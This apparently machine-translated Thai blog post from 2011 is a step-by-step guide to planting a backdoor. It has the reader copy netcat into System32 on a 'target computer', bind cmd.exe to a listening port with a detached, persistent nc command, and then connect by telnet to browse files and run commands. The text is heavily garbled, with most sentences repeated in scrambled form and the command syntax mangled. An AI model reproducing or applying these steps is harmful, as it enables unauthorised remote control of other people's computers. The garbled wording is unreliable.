วันอังคารที่ 31 พฤษภาคม พ.ศ. 2554

«สร้าง brakdoor (telnet) ภาคปฎิบัติ-รายชื่อโปรแกรมประเภทblackbor

«สร้าง brakdoor (telnet) ภาคปฎิบัติ-รายชื่อโปรแกรมประเภทblackbor


ตอนที่ 1 Download Netcat for Windows, พอร์ตของ
โปรแกรม Unix นิยมที่ให้คุณ
อ่านและเขียนข้อมูลในโปรโตคอ ล TCP
Netcat Download for Windows, พอร์ตของโปรแกรม Unix
นิยมที่ ช่วยให้คุณสามารถอ่านและเขียนข้อมูลในโปรโตคอล TCP โปรแกรมนี้
ฟรีและ open - source, ดังนั้นคุณจึงไม่ต้องจ่าย
ทุกคนใช้และคุณสามารถตรวจสอบ แหล่งที่มา
code สำหรับโปรแกรมหากคุณต้องการทำ
โปรแกรมนี้ฟรีและ ซอร์สดังนั้นคุณไม่ต้องจ่ายทุกคนใช้และคุณสามารถตรวจสอบรหัสที่มาสำหรับ โปรแกรมหากคุณต้องการทำ


ขั้นที่ 2 ขั้นตอนที่ 2 Unzip โปรแกรม
ใช้อรรถประโยชน์ Windows Unzip ไว้ในโฟลเดอร์ใด
คุณต้องการ Unzip โปรแกรม Windows ใช้อรรถประโยชน์ Unzip ไปยังโฟลเดอร์ที่คุณต้องการใดๆ
Unzipping เพื่อ Desktop ลงในโฟลเดอร์ที่เรียกว่า"netcat"
จะได้ง่ายต่อการจำ Unzipping เพื่อ Desktop ลงในโฟลเดอร์ที่เรียกว่า netcat"
"จะง่ายต่อการจำ

ขั้นที่ 3 ขั้นที่ 3 ใช้"โปรแกรม"nc.exe และคัดลอกลง
คอมพิวเตอร์เป้าหมายที่คุณต้องการติด ตั้งประตูกลับไป ใช้"โปรแกรม"
nc.exe และคัดลอกไปยังคอมพิวเตอร์เป้าหมายที่คุณต้องการติดตั้งประตูไปกลับให้แน่ใจ ว่าใส่ nc.exe
directory"โปรแกรมลงใน"C : \ Windows \ System32 ในเป้าหมาย
เครื่องจักร ให้แน่ใจว่าได้วางโปรแกรม nc.exe ลงใน"C : \ directory Windows \ System32"
เป้าหมายบนเครื่อง

ขั้นตอน 4 ขั้นตอนที่ 4 เปิดพร้อมรับคำสั่งโดยเลือกปุ่ม"เริ่ม
คลิก"Run"แล้วพิมพ์"cmd"และกด ปุ่ม"Enter"
เปิดพร้อมรับคำสั่งโดยเลือกปุ่ม"Start คลิก"Run"แล้วพิมพ์"cmd"และกดปุ่ม"Enter"ใช้"cd"
คำสั่งเพื่อนำทางไป ยังโฟลเดอร์ที่คุณวาง nc.exe ที่
โครงการ ใช้"คำสั่ง"cd เพื่อนำทางไปยังโฟลเดอร์ที่คุณวางโปรแกรม nc.exe คำสั่งที่ต้องทำ
นี้จะ เป็นต่อไปนี้ :"cd c : \ windows \ system32.
คำสั่งการทำเช่นนี้จะต่อ ไปนี้ :"cd c : \ windows \ system32

5 5 ขั้นตอนที่ประเภทดังต่อไปนี้เป็นขั้นตอนที่พร้อมรับคำสั่ง :
"nc - L - d - e cmd.exe - p XXX"ที่"XXX"คือหมายเลขพอร์ต
คุณ ต้องการเชื่อมต่อผ่าน ประเภทดังต่อไปนี้เป็นคำสั่ง prompt :"nc -- L -- d -- e
cmd.exe -- p XXX"ที่"XXX"คือหมายเลขพอร์ตที่คุณต้องการเชื่อมต่อผ่านสิ่งที่เลือกสูง
เช่น port 10000 หรือสูงกว่า เลือกสิ่งที่สูงเช่น 10000 พอร์ตกว่าหรือสูง

6 ขั้นตอน 6 ขั้นตอนที่ในเครื่องของคุณเปิดพร้อมรับคำสั่งและประเภท
ตามคำสั่ง "telnet XXXX XXX"ที่"XXXX"เป็น
ที่อยู่ IP ของคอมพิวเตอร์เป้าหมายและ"XXX"คือพอร์ตของเป้าหมาย
คอมพิวเตอร์ที่คุณ เปิดก่อน บนเครื่องของคุณเปิดพร้อมรับคำสั่งและพิมพ์คำสั่งต่อไปนี้ :"telnet
XXX"XXX XXXX"XXXX"ที่"เป็นที่อยู่ IP ของคอมพิวเตอร์เป้าหมายและ"
คือพอร์ตของเครื่องคอมพิวเตอร์เป้าหมายที่ คุณเปิดก่อนหน้านี้คำสั่งนี้จะเปิดการเชื่อมโยงข้อมูลระหว่าง
สอง คอมพิวเตอร์ซึ่งคุณสามารถค้นหาไฟล์เรียกใช้คำสั่ง
และดำเนินการอื่นๆ
คำ สั่งนี้จะเปิดการเชื่อมโยงข้อมูลระหว่างสองคอมพิวเตอร์ซึ่งคุณสามารถค้นหา ไฟล์คำสั่งใช้และดำเนินการอื่นๆ


ไม่มีความคิดเห็น:

แสดงความคิดเห็น